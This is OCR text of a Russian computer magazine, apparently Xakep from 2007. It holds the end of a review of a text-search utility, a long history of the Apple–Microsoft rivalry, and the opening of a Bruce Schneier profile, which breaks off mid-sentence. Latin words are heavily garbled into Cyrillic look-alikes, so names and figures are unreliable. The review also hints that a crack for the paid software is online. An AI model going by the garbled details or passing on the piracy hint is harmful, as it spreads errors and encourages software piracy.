вниманию утилу Зирег Техі ЗеагсЬ. Тулза 
предназначена не столько для поиска файлов, 
сколько для парсинга их содержимого. Вот 
представь: на носу аттестация/ сессия/кур- 
совая/диплом (нужное подчеркнуть), а ты как 
нельзя кстати посеял на винте среди прочего 
мусора свои университетские наработки. 
Причем найти последние ручками не пред- 
ставляется возможным из-за невероятного 
количества различного хлама, среди которого 
нужно искать. Знакомая ситуация? «Тогда 
мы идем к Вам» :). Аточнее, не мы, а Зирег 
Техі ЗеагсЬ. Утила поможеттебе не только 
быстренько просканить хард на наличие не- 
обходимых документов, но и найдет файлы оп- 
ределенного типа (например, 1x1) с указанной 
строкой внутри. Кстати, опций у проги более 
чем достаточно, так что теперь ты сможешь 
выполнять свои академические обязанности, 
не запариваясь поиском потерянных/забытых 
доков. 

Огорчаеттолько одно — софтина платная, а 
триал доступен 1 5 дней. Однако, по достовер- 
ной информации, в Сети есть лекарство. А кто 
ищет, тот, как известно, всегда найдет :). 
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МАРИЯ «МІРВІІ.І.» НЕФЕДОВА 

/ мігтштооіск.рш / 




ЧАСТЬ ВТОРАЯ 



Итак, мы продолжаем сравнивать истории 
двух гигантов мира ІТ — Арріе и Місгозоіі:. 
Во второй части речь пойдет о прямой кон- 
куренции компаний, судебных исках, выпа- 
дах в адрес друг друга и, главное, о прогрес- 
се, который рождался в жестоких боях за 
рынок софта и железа. 



Первая модель Мас’а 






В ВСЕ НАЧАЛОСЬ С 005 

Начало 80-х годов ознаменовалось для МісгозоЙ приходом в компанию 
Стива Баллмера (5іеѵе Ваіітег), который и сегодня стоиту ее руля, а также 
перестановкой кадров на верхах. В 1 981 году компания становится акцио- 
нерным обществом, Билл Гейтс занимает пост президента и председателя 
совета директоров МісгозоЙ, а Пол Аллен получает пост исполнительного 
вице-президента. Компания начинает обретать знакомые нам черты. 
Параллельно с кадровыми изменениями происходили вещи, имеющие ни 
много ни мало историческоезначение. Непосредственно в 1980 годубыло 
заключено соглашение с фирмой ІВМ о разработке интерпретатора языка 
ВА5ІС для готовящихся к выпуску ІВМ РС. Представители ІВМ также упомя- 
нули, что им понадобится операционная система. В ответ Гейтс посовето- 
вал им обратиться в компанию Бідйаі РезеагсЬ Іпс. (БРІ), разработавшую 
ОС СР/М, имевшую довольно широкое хождение. Но переговоры между 
ІВМ и БРІ успехом неувенчались. Впоследствии Гейтс не раз говорил, что 
не понимает, как можно было упустить та кую сделку, и в связи с этим весьма 
нелестно отзывался об основателе БРІ — Гари Килдолле (Сагу КіШаЩ. 
Потерпев неудачу с 0Р1, ІВМ вновь вернулась к МісгозоЙ и попросила 
предоставить им приемлемую операционную систему. Также на перего- 
ворах шла речь и о таких продуктах МісгозоЙ, как Вазіс, Рогігап, Разсаі, 
и прочем софте для программеров. Уже через неделю Гейтс предложил 
использовать в качестве основы систему 86-005 (ака 0005) от компании 
5еайІе Сотрійег Ргосіисіз (5СР), практически клона СР/М. Идея всем 
понравилась, и М іеговой заключила с 5СР сделку, получив лицензию, а 
позже и полные права на 86-005. Притом во время заключения сделки 
информация отом, что ІВМ — потенциальный заказчик, осталасьза кадром, 
а сама сумма сделки была смехотворна (особенно по нынешним време- 
нам) — менее $50 000. Ось была немного переработана, втом числе при 
участии ее специально приглашенного создателя — Тима Паттерсона (Тіт 
Раіегзоп), и представлена ІВМ. Так как в продукте был обнаружен ряд багов, 
ІВМ доделала ОС самостоятельно и назвала ее РС-005 (ІВМ Регзопаі 
Сотрійег 005). МісгозоЙ получила за работу единовременный гонорар, но 



придержала авторские права, оставляя за собой возможность продавать 
систему и другим компаниям. 

Оказалось, что это решение было очень правильным. В 1 983 году СоІшпЬіа 
Баіа Ргосіисіз дала старт повальному клонированию ІВМ РС, полностью 
воспроизведя ІВМ ВІ05. МісгозоЙ же, по сути, принадлежал весь код систе- 
мы, и компания официально имела полное право контролировать свои раз- 
работки, связанные с 86-005. Подсуетившись, она запускает в производс- 
тво свой собственный продукт — операционную систему М5-005 (МісгозоЙ 
Оізк Орегабпд Бузіет). В принципе, РС-005 и М5-005 отличались друг от 
друга мало (например, сочетание клавиш <СМ-АЙ-БеІ> придумали именно 
в ІВМ, так как перезагрузить детище М іеговой было невозможно), но со- 
гласно договору система называлась РС-005, когда ставилась на машины 
ІВМ, и М5-005, если ее отдельно продавала МісгозоЙ. Благодаря очень 
жестким маркетинговым ходам и вышеупомянутым авторским правам, 
МісгозоЙ стала стремительно превращаться из небольшой фирмы, разра- 
батывающей софт, в одну из самых влиятельных компаний в этой сфере. 
Мало кто знает, но М5-005 был не первой операционкой, созданной 
МісгозоЙ. М5-005 принес компании успех и вес, однако до него и парал- 
лельно с ним существовали ІІЫІХ-подобный Хепіх и М5Х-Б05, даже имев- 
ший некоторую популярность за океаном. Разработка Хепіхзавершилась, 
так практически и не начавшись. Система планировалась как плацдарм 
для первого текстового процессора от МісгозоЙ — МісгозоЙ ѴѴогб, исходно 
называвшегося МиЙі-ТооІ ѴѴогсІ. Но в светХепіхтак и не вышел — неувидев 
перспективы в дальнейшей работе над ним, МісгозоЙ продала права на 
него компании-подрядчику 5ап{а Сгиі Орегайоп (5С0), которой было пору- 
чено адаптировать систему под разные платформы. Но и 5С0тоже вскоре 
прекратила разработки, связанные сХепіх. 

Что до М5Х-Б05, созданного для компьютеров стандарта М5Х (МасЫпез 
ѵѵійі 5оЙѵѵаге еХсЬа пдеаЬі Іііу) , особой популярности ось не имела, 
придясь по душе лишь японцам, что неудивительно — этот стандарт 
продвигал именно японский филиал МісгозоЙ во главе с Казахико Ниши 
(КаіиЫко ЫізЫ). М5Х-Б05 был попыткой обрести большее влияние 
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Аппіе 



Легендарная машинка ІВМ 



на рынке домашних компьютеров, ведь МЗ-йОБ позиционировался как 
система для офисов. Всего было продано порядка 5 миллионов машин 
стандарта М5Х, и это весьма неплохой результат. К примеру, продажи Арріе 
II составили около2 миллионов экземпляров, а Атзігасі СРС — 3 миллиона. 
В 1 983 году Пол Аллен покинул пост вице-президента. У него обнаружили 
болезнь Ходжкина, а проще говоря, рак. Несмотря на то что после курса 
лучевой терапии и пересадки костного мозга врачи признали Аллена здо- 
ровым, в МісгозоЛ он не вернулся и стал постепенно удаляться отдел, хотя 
и остался в совете правления компании. 

г ИСТОРИЯ ЛИЗЫ И МАКИНТОША 

Для Арріе 80-е начались с разработки двух новых проектов: Арріе III и Арріе 
□за. В отличие от имевшего большой успех Арріе II, новые проекты были 
скорее рабочими станциями, чем домашними компьютерами. Из-за более 
серьезной начинки выросла и их стоимость, составив порядка $5000-8000. 
Арріе III должен был стать главным оружием в борьбе с конкурентами, в 
частности с ІВМ (и компанией МісгозоЛ, которая, какты уже знаешь, стояла 
за выходом ІВМ РС). Разработка велась под патронажем Джобса, так как 
главный гений-инженер — Стивен Возняк в феврале 1981 года попал в 
авиакатастрофу и после реабилитации в компанию не вернулся, решив все 
же получить высшее образование. Стоит заметить, что, несмотря на все 
это, Возняки по сей день числится служащим Арріе, получает зарплату и 
является акционером компании. 

Но вернемся к Арріе III и Джобсу. Именно он настоял на увеличении мощнос- 
ти, постоянно подгонял команду инженеров с выпуском. И весьма консер- 
вативный и очень компактный корпус тоже был его идеей. Атак как гением 
инженерной мысли Джобс никогда не был... Именно корпус и погубил третью 
модель Арріе. Ради компактности из конструкции пришлось выкинуть все 
вентиляторы. Компьютеры страшно перегревались и горели. Ктомуже 
сборка тоже оставляла желать лучшего: в компанию то и дело обращались 
возмущенные клиенты сжалобами, что платы просто-напросто развали- 
ваются. Из-за всех этих недочетов из продажи пришлось отозвать около 14 



000 Арріе III. К 1983 году Арріе III вернулись на рынок в доработанном виде, 
ошибки были исправлены, но было поздно — провал уже состоялся. 
Параллельно с этим часть сотрудников Арріе сфокусировалась на разра- 
ботке «компьютера, который изменит мир», — Арріе І_іза. Именно благодаря 
І_іза в нашем лексиконе появились слова «мышь», «иконка» и «десктоп», 
ведьуЛизы был (о чудо!) графический интерфейс. Вдохновение пришло к 
Джобсу во время посещения исследовательского центра компании Хегох, 
где были продемонстрированы разработки в области 6111 (дгарЬісаІ изег 
іп^еНасе). Джобс проникся мыслью, что будущее именно за графикой, а не 
за привычной командной строкой. Таким образом, вышедшая в 1983 году 
І_іза была пиком технического прогресса —тут имели место графический 
интерфейс, возможность подключения мыши, собственная операционная 
система ЮЗ (І_іза ОЛісе Зузіет) и очень мощная потем временам конфи- 
гурация (процессор Моіогоіа 68000 5 МГц, 1 Мб ОЗУ, 5- или 10-Мбжесткий 
диск, 5-дюймовый дисковод Тѵѵідду). Но и стоила машина соответственно 
— $9995, что по сегодняшним меркам составляет примерно $21 000. Нужно 
ли говорить, что из-за цены І_іза была совершенно нерентабельна, а объем 
продаж ничтожен. Из-за неудачи с Арріе III совет директоров компании по 
настоянию Маккулы (акционера, инвестора и члена правления компании) 
принял решение отстранить Стива Джобса от разработки І_іза. Таким обра- 
зом, доделывали «пиктехнического прогресса»уже без него. 

Разгневанный Джобс не стал терять времени даром и быстро затесался в 
проект по разработке компьютера Масіпіозб. Изначально это была даже 
не разработка, а исследование профессора Джефа Раскина реі 1 Разкіп), 
который горел идеей создать простой и недорогой компьютер, понятный 
даже начинающему пользователю. Интересно, но когда в 1 979 году Рас- 
кин только начал продвигать эту идею и получил финансирование, Джобс 
был одним из главных ее противников и вставлял Раскину палки в колеса, 
кактолько мог. Но когда его «ушли» из проекта Ыза, жаждущий мести 
Джобс внезапноуверился, что именно МасіпІозЬ сможет переплюнуть 
Лизу, да и вообще МасіпІозЬ вдругоказался оченьхорошей и интересной 
разработкой. 
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ѴѴіпсіобЗ.І 1 



ѴѴіпсіоѵѵб 2.0 



В 1982 году Раски н уволился из Арріе ввидуличного конфликта с Джобсом, 
отдав Мае в полное распоряжение Стивена. У разработки быстро прорезались 
черты, явно присущие Арріе Ыза, — мышь и графический интерфейс. Система 
строилась на подсмотренныхуХегох основах, но множество элементов было 
придумано командой Арріе: например, всплывающие меню, меню наверху 
окошеки принцип сііск-апб-сігад («щелкнул и потянул»), разработанный еще 
лично Раскиным. По сути эта операционная система была не чем иным, как 
прародителем всем известной МАС 05. Выход Масіпіозб в свет состоялся 
в 1984 году и сопровождался массовой рекламной компанией, ставшей 
классикой. Во время Суперкубка публике продемонстрировали реклам- 
ный ролик, снятый известным режиссером Ридли Скоттом, основанный на 
культовом романе Джорджа Оруэлла «1984». В ролике безымянная девушка, 
олицетворявшая Мае, разбивала кувалдой огромный экран Большого Брата, 
символизировавший ІВМ РС. Заканчивался роликфразой:«24января Арріе 
Сотриіег представит Арріе Масіпіозб, и вы увидите, почему 1984 год будет не 
похож на "1984"». В ноябре-декабре 1984 года Арріе выкупила все 39 реклам- 
ных страниц вжурнале ЫеѵѵБѵѵеек, опубликовав на всех 39 рекламу МасіпІовЬ. 
Параллельно с Мае появилась и І_іва II. Цена Лизы уменьшилась почти вдва 
раза, но конкуренцию с Мае она все равно не выдержала. 

Однако все шло далеко не так гладко, как могло показаться. Провальные 
продукты ударили по компании очень больно; последовали массовые 
сокращения сотрудников; назрело недовольство в совете директоров. И в 
1 983 году Джобс, поняв, что не справляется со своими обязанностями, при- 
гласил на должность президента Джона Скалли РоИп Зсиііеу), работавшего 
в компании РервіСо. Между Скалли и Джобсом постепенно стали возникать 
разногласия, в итоге переросшие в серьезныетрения. Кульминацией кон- 
фликта стало увольнение Джобса из Арріе в 1985 годуй судебный процесс 
против него (дело было решено миром и закрыто). 

В том же году, после ухода Стивена, Скалли подписывает контракте 
Місгобоіі, давая последним разрешение на использование некоторых эле- 
ментов 6111 МАС 05 в обмен нато, что МісгобоЛ продолжит разрабатывать 
для Арріе софт (ѴѴогсІ, Ехсеі). Именно из-за этого контракта Арріе впоследст- 
вии не раз и не два проиграет судебные процессы против Місгозоіі. 

В 1987 году дела пошли в гору. Выходит МасіпІОБЬ II, он мощнее своего 
младшего брата и удобнее за счеттого, что подходит практически к любой 
модели монитора и имеет шесть слотов расширения технологии РІид’п’РІау. 
Второй Мае оснащен шиной ЫііВііб, которая сама распознаети настраивает 
устройства, в результате чего даже не слишком опытный пользователь в 
состоянии справиться с установкой железа. Стоит отметить, что машины 
ІВМ подобной роскошью пользователя не баловали. Прибавим кэтомутот 
факт, что к Мас’ам писалось очень много софта и игр от сторонних разработ- 
чиков. В частности, стереотип использования Макинтошей втипографском 
деле и полиграфии появился именнотогда, с выходом программы Аісіііб 
Р адетакег(АІсІи5 — в будущем АбоЬе). В 1989 году Арріе и вовсе пошла 
на рекорд и обогнала по продажам даже ІВМ. Однако чем выше взлет, тем 
больнее падение. 



Н ѴѴШ00ѴѴ5... 

Но вернемся к Місгобоіі. Как известно, идеи витают в воздухе, а великие 
умы сходно мыслят. Билл Гейтс заговорил об оси на основе 6СІІ в 1 982 году. 
Толчком к этому точно также, каки в случае с Джобсом, послужил пример 
компании Хегох и их разработки в этой области. И конечно, не обошлось 
без фактора конкуренции — нужно было успевать за рынком. Впервые 
наработки по ѴѴіпсіоѵѵб были продемонстрированы публике в 1 983 году на 
выставке Согпсіех. По сути, это была не операционная система, а графи- 
ческая надстройка над М5-Б05. Релиз ѴѴіпсіоѵѵб 1.0 состоялся лишь два 
года спустя — 20 ноября 1 985 года, и нельзя сказать, что система удалась 
на все 1 00%. Но это был достойный ответ Арріе на выпуск МасіпІозЬ и Ыза и 
громкое заявление о себе. Перспективная, быстроразвивающаяся ОС для 
ІВМ-совместимых машин не могла остаться незамеченной, но по-настоя- 
щему популярной ѴѴіпсіоѵѵб станеттолько в 90-е, после выхода ѴѴіпсіоѵѵб 3.1. 
Само собой, вместе с 6111 машины с ѴѴіпсіоѵѵб на борту обзавелись и мышка- 
ми. Параллельно с этим Місгобоіі заключаете ІВМ еще одно соглашение: о 
совместной разработке операционной системы 05/2 специально для ІВМ 
05/2. Релиз 05/2 состоится в 1 987 году. 

ѴѴіпсіоѵѵб же неспешно прогрессирует, обзаводясь новыми функциями и 
приложениями. Версия 2.0 выходит в 1 987 году, и в ней окошки уже могут 
накладываться друг на друга, в то время как в первой версии окна можно 
было расположить только по принципу плитки — встык. И именно в 2.0 
вошли и первые Місгобоіі ѴѴогсІ с Місгобоіі Ехсеі. 

В 1 988 году после выхода ѴѴіпсіоѵѵб 2.0.3 Арріе подает на Місгобоіі в суд, за- 
являя о нарушении авторских прав, усмотрев излишнее сходство ѴѴіпсіоѵѵб с 
МАС 05, в частности очень похожие иконки. 

Одновременно сэтим Місгобоіі выводит на рынокряд весьма серьезных 
программ. Сначала Місгобоіі ѴѴогкз — комплексную офисную програм- 
му стекстовым редактором, таблицами, базой данных и т.д. Программа 
совместима с Арріе МасіпІОБЬ. А в 1989 году выходитзнакомый всем и 
каждому Місгобоіі 0№се. В отличие отМісгоБОІіѴѴогкз, который объединяет 
в себе все сразу, в Місгобоіі Оібсе приложения разделены: Місгобоіі ѴѴогсІ 
отдельно, Місгобоіі Ехсеі отдельно и т.д. 

г ѴѴШООѴѴ5 95 

Для МісгоБОІІ 90-е стали временем триумфа, начиная с самого выхода 
ѴѴіпсіоѵѵб 3.0 в начале 1 990 года. Доработок было множество — это и удобный 
графический пользовательский интерфейс, и использование всей мощ- 
ности процессоров 80286, 80386, и другие полезные вещи. За две недели 
было продано свыше 1 00 000 копий, а за полугодие, по подсчетам, выходило 
больше двух миллионов. ѴѴіпсіоѵѵб приносила МісгобоО: большую часть при- 
были, в отличие от05/2. В связи с этим в компании было принято решение 
максимально сосредоточиться на ѴѴіпсіоѵѵб, и партнерство с ІВМ относи- 
тельно 05/2 закончилось. Нельзя отрицать и того, что это сыграло на руку 
Місгобоіі — впоследствии, когда популярность 05/2 стала падать, эстафету 
перехватила ѴѴіпсіоѵѵб, быстро став самой популярной платформой для ПК. 
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МймГШНМѵбнК 



МЮВОЮГГ 



МісговоЙ ВоЬ, запущенный под Ѵізіа 



Реклама М5-005 1981 года 



В 1991 году был основан МісговоЙ РевеагсЬ — исследовательский центр 
компании, а в 1992 году состоялся релиз ѴѴіпсіоѵѵб 3.1 . Из нововведений 3.1 
достойны упоминания поддержка мультимедиа, воспроизведение видео, 
первые скринсейверы. Также МісговоЙ впервые прибегла к рекламной 
компании поТВ.Таккакединственным серьезным минусомЗ.1 было от- 
сутствие поддержки сети, вслед за ней выходитЗ.хх для рабочих групп, где 
поддержка сети уже присутствует. 

Кэтому времени МісговоЙ Ойісе становится лидирующим в своей сфере 
рынка. А в ноябре 1992 года выходит М іеговой Асеева, еще сильнее укреп- 
ляя позиции ПО от М іеговой. 

К 1 993 году ѴѴіпсіоѵѵб становится самой распространенной в мире осью с 61)1, 
а журнал Рогіипе называет МісговоЙ «самой передовой компанией, рабо- 
тающей в США». Крометого, наконецзаканчивается пятилетняя судебная 
тяжба с Арріе по поводу авторских прав. МісговоЙ выигрывает дело. В этом 
же году появляется ѴѴіпсіоѵѵб ІЧТ. Она строится на совершенно ином ядре, и 
это первая ОС от МісговоЙ, использующая вытесняющую многозадачность 
(ргеетрііѵе тийііавкіпд). Она поддерживает файловую структуру ЫТРЗ, 
имеет подсистемы 05/2 и РОЗІХи включает множество других изменений, 
переворачивая представление о ѴѴіпсіоѵѵб. 

Ав 1995 году публике представляют 32-разрядную ѴѴіпсіоѵѵб 95 (редак- 
тор рубрики до сих пор иногда просыпается от воспоминаний об этой 
прекрасной оси — прим. И. А.). Совершенно новый пользовательский 
интерфейс, поддержка РІид’п’РІау, сПаІ-ир, функция сору-равіе и многое 
другое. Это был настоящий прорыв, за первые четыре дня продано более 
миллиона копий. Интересно, но в системе не было браузера, поскольку 
в МісговоЙ еще не успели таковой сделать. Іпіегпеі Ехріогег появился 
в результате договора с компанией Зрудіавв и был создан на основе их 
браузера Моваіс. Версия 1 .0 вышла в том же 1 995 году в комплекте пака 
\Л/і псіоѵѵв 95 Ріив!. В ѴѴіпсіоѵѵб ІЕ был интегрирован позже. И этим же 
годом датирован выход одного из самых провальных продуктов МісговоЙ 
— дружественного пользователю МісговоЙ ВоЬ, интерфейса для З.іх 
и 95, а проще говоря, оболочки. ВоЬ включал в себя ряд офисных про- 
грамм, но его первоочередной задачей была помощь полным чайникам, 
так что каждое действие (даже создание нового текстового документа) 
сопровождалось дотошным пошаговым руководством. Отдельно стоит 
отметить мультяшную, психоделическую графику, о которой даже и 
говорить ничего не надо — достаточно на нее просто взглянуть. ВоЬ 
занял седьмое место среди худших продуктов всех времен и народов, 
по версии РС ѴѴогШ, и стал худшим продуктом декады, по версии сайта 
СІЧЕТ.сот . 

В середине 90-х МісговоЙ вплотную берется за освоение Всемирной 
паутины. Первым шагом становится запуск МЗЫ (МісговоЙ Ыей/ѵогк] в 
пику гиганту АО І_. МЗЫ объединила не один и не два онлайновых сер- 
виса. Несмотря на то что в становлении интернета (конец 80-х — начало 
90-х годов) МісговоЙ особенного участия не принимала, в начале 90-х 
компания сделала инвестиции в ряд продуктов, которые к середине 



десятилетия себя более чем оправдали. Наиболее ярким примером 
может служить АсІіѵеХ, построенный на основе МісговоЙ Согпропепі 
ОЬіесІ Мобеі (СОМ). 

В 1997 году выходят МісговоЙ Ойісе 97 и Іпіегпеі ЕхрІогег4.0. ІЕ начинает от- 
воевывать рынокбраузерову Ыеівсаре. Не последнюю роль в этом сыграло 
соглашение с Арріе, о котором речь пойдет ниже. 

В середине 90-х появляется и модификация ѴѴіпсіоѵѵб для КПК — ѴѴіпсіоѵѵб СЕ. 

В 1998 году происходит сразу ряд знаменательных событий. Гейтс назна- 
чает Баллмера президентом компании, сам, впрочем, оставаясь на посту 
исполнительного директора и председателя. Выходит ѴѴіпсіоѵѵб 98, пере- 
хватывая эстафетуу 95-й и еще более укрепляя позиции компании. Также 
открывается представительство МісговоЙ в Индии, тамошняя штаб-кварти- 
ра в будущем станет второй по величине после штаб-квартиры в США. 

г ДЖОБС. ИНОГДА ОН ВОЗВРАЩАЕТСЯ 

К началу 90-х Арріе тоже чувствовала себя неплохо, если не сказать процве- 
тала. Тому способствовал успех МасіпІовЬ II, ряд предложений от крупных 
исследовательских центров и предприятий. Но вто время как производите- 
ли РС-совместимых машин старались сделать свои продукты как можно де- 
шевле и доступнее, Арріе проявляла свою фирменную «звездную болезнь» 
и, отмахиваясь оттенденций рынка, упирала на компы дорогие, мощные и 
самые-самые. В 1 990 году вышел самый быстрый компьютер из семейства 
Мас’ов — МасіпІовЬ Ійх стоимостью от $10 до 1 2 тысяч в зависимости от 
конфигурации. 

В 1 991 году, после неудачной попытки с ноутбуком МасіпІовЬ РогІаЫе, 
выходит РоѵѵегВоок, сумевший завоевать очень широкую популярность. 
Вслед за этим публике представляютсерию МасіпІовЬ Оиасіга — мощные 
мультимедийные машины, в которых появилась даже функция распозна- 
вания речи. Но привлекали компьютеры Арріе не ценой и наворотами, а, 
скорее, уникальной осью и 61)1. 

Положение дел резко изменилось, когда в 1992 году МісговоЙ выпустила 
ѴѴіпсіоѵѵб 3.1, и сегмент рынка РС резко обошел Арріе — уже в 1993 году 
продажи РС превышали продажи Арріе более чем в 10 раз. Противопоста- 
вить такому развитию событий Арріе было нечего. Частично ситуацию спас 
альянс Арріе, ІВМ и Моіогоіа, основанный еще в 1991 годуй построенный 
на принципе «против кого будем дружить». Целью объединения было 
создание новой платформы РРеР (РоѵѵегРС Реіегепсе РІаЙогт), где ІВМ и 
Моіогоіа отвечали за железо, а Арріе — за софт. Все это должно было стать 
достойным ответом компании МісговоЙ, которую кэтому моменту Арріе уже 
рассматривала каксамого настоящего врага. 

На основе РРеР в 1994 году был представлен Роѵѵег МасіпІовЬ, в котором 
использовался процессор РоѵѵегРС отІВМ. Но тут присутствовали опреде- 
ленные неудобства. Например, частично была переписана операционная 
система, и софт, сделанный под Мас’и ранее, запускался на РоѵѵегРС только 
в режиме эмуляции. 

Помимо компьютеров Арріе решала заняться и другими девайсами. 
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Так, в 1 993 году выходит провальный РйА Ыеѵѵіоп. В том же году Скалли 
на посту генерального директора сменяет Майкл Спиндлер (МісЬаеІ 
5ріпсІІег). Однако всего этого оказалось недостаточно, чтобы вернуть 
Арріе былую популярность. Сказывалось и то, что РС производились 
по всему миру, тогда как Арріе свои компьютеры делала сама. Попыт- 
ка продать лицензию на Мае’ и тоже не принесла особенного успеха 

— серые Арріе не пользовалисьу пользователей особой популярностью. 
Определенный результат дал переход на шину РСІ. Продажи подросли, 
но все равно не устраивали совет директоров. 

А в 1996 году происходит долгожданное воссоединение. Арріе покупает 
компанию ЫеХТ (и их ось ІЧеХТзІер соответственно), созданную Джобсом 
в «постъяблочный» период, и Стивен возвращается в совет правления. 
За прошедшие 10 летонуспел многое, в частности поработать над рево- 
люционным проектом ЫеХТ — компьютерами нового поколения. ЫеХТ на 
рынке не выжил опять-таки по причине излишней дороговизны и наво- 
роченности. Очевидно, «свободное плавание» Джобса кое-чему научило 

— по возвращении он сразу стал принимать радикальные меры: снизил 
цены на продукцию Арріе, прикрыл совсем нерентабельные разработки, 
вроде того же Ыеѵѵіоп, и развернул агрессивную рекламную компанию. 
Арріе стала подстраиваться под рынок. 

В 1997 году Джобс объявляето соглашении с Місгозоіі, согласно кото- 
рому Гейтс и компания инвестируют в Арріе $1 50 миллионов, ате, в свою 
очередь, включат браузер ІЕ в МАС 05. Параллельно с этим Арріе начинает 
выкупать обратно все лицензии на производство Мас'ов. И в том же году 
Джобс официально возвращается в президентское кресло, при этом 
припомнив «все хорошее» старым врагам —тем, из-за кого его уволили 
ІОлетназад. Всеони покинули компанию. Первый же шаг Джобса вэтой 
должности — начало работы над іМас. 

В конце 90-х компания выпускает один за другим ІМас, РоѵѵегВоок, іВоок, 
Роѵѵег Мае 64. Машины варьируются, чтобы охватить большую часть рынка. 
Арріе уже не зацикливается на предельной мощности и цене, распределяя 
продукцию равномерно — модели для дома, среднеуниверсальные машины 
и профессиональные рабочие станции. 

г И ВНОВЬ ПРОДОЛЖАЕТСЯ БОЙ 

XXI век, в котором мы живем сегодня, можно отнести к новейшей истории. И 
пусть его первое десятилетие уже на исходе, продукты, выпущенные обеи- 
ми компаниями, — это наше стобой настоящее. Они хорошо нам знакомы, 
ведь мы сталкиваемся и работаем сними постоянно. Поэтому по событиям 
2000-х годов пройдемся достаточно бегло. 



МісгозоЙ: продолжила работу над ѴѴіпсІоѵѵз, результатом чего стал выход 
ѴѴіпсІоѵѵз 2000, МЕ, СЕЗ.О.ХР. Кстати, вХР первый раз со времен ѴѴіп 95 
поменялся пользовательский интерфейс и впервые появиласьзащита от 
пиратства. Стоит ли говорить, что доля софтварного рынка, принадлежащая 
Місгозоіі, велика. Ее размеры можно легко представить, вспомнив нашу- 
мевший судебный процесс США против Місгозоіі, когда компанию обви- 
нили в чрезмерной монополизации рынка и в судебном порядке приказали 
разделить на две части. Приговор суда потом был частично обжалован, но 
осадок остался. 

Занялась Місгобоіі и рынком игровым, выпустив приставку ХВох, 
поддержкой и доработкой которой занимается и сегодня, составляя 
серьезную конкуренцию 5опу и ІЧіпІепсІо. 

Ну а выход проекта, известного при разработке как Бопдіюгп и в итоге 
оказавшегося ѴѴіпсІоѵѵз Ѵізіа, а также ОІІісе 2007 — это и вовсе события 
текущего 2007 года. Как известно, переход на Ѵізіа идет не так хорошо, как 
планировалось. Компании даже пришлось продлить период поддержки 
ХР. Однако Гейтс не раз говорил со спокойной уверенностью, что нужно 
просто подождать и все будет. 

Из последних новостей стоитупомянуть заявление Гейтса, сделанное 
летом 2006 года, гласившее, что к середине 2008 года он собирается 
отойти от ежедневного участия в делах МісгозоО:, а также слухи о будущей 
покупке компании ѴаЬоо. 

Арріе в XXI веке отошла от образа компании, производящей только 
компьютеры. Их плеер іРосІ, выпущенный в 2001 году, признан самым 
узнаваемый плеером на планете. Ктомуже продажи ІРосІ — это один из 
основных источников дохода компании. С ІРосІ тесно связан онлайновый 
магазин іТипез, через который Арріе распространяет цифровые аудио- и 
видеозаписи. Разумеется, не бесплатно. 

У руля компании по-прежнему стоит Стивен Джобс. Благодаря его нара- 
боткам в ЫеХТ выпущена операционная система МАС 05 X, базирующая- 
ся на оси ЫеХТзІер. 

В 2006 году компания перешла с процессоров РоѵѵегРС на Іпіеі, став еще 
ближе к РС. Планировалось, что переход на I пѣеі полностью завершится 
к концу 2007 года, но в итоге Арріе управилась раньше — уже к концу 2006 
года. Модельная линейка компьютеров на сегодня выглядит следую- 
щим образом: десктопы МасРго, ІМас и Мае тіпі, ноутбуки МасВоок и 
МасВоок Рго, серверы Хзегѵе и профессиональные мониторы. 

В начале 2007 компания сменила имя с Арріе Сотриіег, Іпс. на Арріе, Іпс. 
Джобс пояснил, что слово «компьютер» в названии уже не слишком хорошо 
отражает текущее положение вещей, ведь Арріе занимается и другими 



► 088 



ХАКЕР 11 /107/ 07 




сцена 




Да ладно, крутая. Я ѳе из 
торрента утянул еще за 4 
дня до начала продаж. Тупое 
глюкалово этот Леопард :). 



Ѵіпсіоѵѵз 98 



Арріе только что выпус- 
тила новую версию Мае 
ОЗ — 1_еораг<± Кажется, 
система очень крутая. 



разработками. Яркийтому пример — релиз мобильного телефона іРЬопе 
летом этого года. 

г ИНТЕРЕСНО 

• В 1984 году Пентагон запретил поставлять компьютеры МасіпіовЬ в 
страны с коммунистическим режимом. Так что технология Моіогоіа СРІ), 
которую использовали Мас’и в Советском Союзе была недоступна. 

• Первые версии М3 ѴѴогб выходили под названием МиШ-ТооІѴѴогсі и 



писались для неудавшейся системы Хепіх. ѴѴогб стал первой программой, 
которая отображала жирный шрифт, а также первой программой, демонс- 
трационные копии которой распространялись бесплатно, в качестве прило- 
жения кжурналу РСѴѴогІб. 

• В 1 985 году Джобс и Возняк получили награды от президента США Ро- 
нальда Рейгана за вклад втехнический прогресс. 

• Стивену Джобсу принадлежит 7% акций компании Оізпеу. Он является 
самым крупным ее физическим акционером, цц 
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Первая а мире мулы имений нал акустическая 
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МАРИЯ «МІРПІІШ» НЕФЕДОВА 

/ МІРПИ.(.@ШООІСК.ГШ / 



Гений 

криптографии 

Имя: Брюс Шнайер 

Возраст: 54 года 

Место проживания: Миннеаполис, штат Миннесота, США 
Деятельность: криптография, информационные технологии 
Блог: ѵѵѵѵѵѵ.зсІіпеіег.сот/Ыод 



Биография и проекты 

Криптография — одна из старейших наук на Земле, ее история насчи- 
тывает несколько тысяч лет. Оно и неудивительно, люди начали испы- 
тывать потребность что-нибудь зашифровать еще задолго до цифровой 
эпохи. Сегодня же, в век высоких технологий, криптография и вовсе вос- 
требована как никогда. Сложно придумать область, где обошлось бы без 
нее, — сотовая связь, интернет во всем его многообразии, электронные 
платежи и далее, далее. И чем сильнее все эти технологии прорастают в 
нашу жизнь, тем больше необходимость в криптографии. 

Брюс Шнайер (Вгисе ЗсЬпеіег), признанный гуру в этой сфере, родился 
15 января 1953 года в Нью-Йорке. По его собственному признанию, 
криптографией он увлекся еще в детстве. Началось все с достаточно 
простых книг на эту тему (часть из которых оказалась обычной фантасти- 
кой) и игр с отцом, когда отец придумывал для Брюса коды, а тот пытал- 
ся их расшифровать. Но с возрастом интерес не пропал. 

Шнайер получил высшее образование, окончив Американский универ- 
ситет со степенью магистра вычислительной техники, а затем универ- 
ситет Рочестера со степенью бакалавра наук в области физики. После 
учебы он успел поработать и в Министерстве обороны США и в крупном 
исследовательском центре, тогда принадлежавшем компании АТ&Т, — 
Веіі І_аЬз. Интересно, что центр был основан еще в 20-х годах прошлого 
века и за ним числятся такие открытия, как изобретение транзистора, 
фотоэлементов, разработка языка Си, первого в мире 32-разрядного 
микропроцессора и т.д. 

Однако криптография привлекала Шнайера сильнее. В середине 90-х 
вышла книга «Прикладная криптография» (Аррііесі Сгуріодгарбу], став- 
шая настоящим бестселлером. Журналисты и критики окрестили ее 
«страшным сном Агентства национальной безопасности США». Шнайер 
стремился написать книгу для нематематиков, книгу, которую ему было 
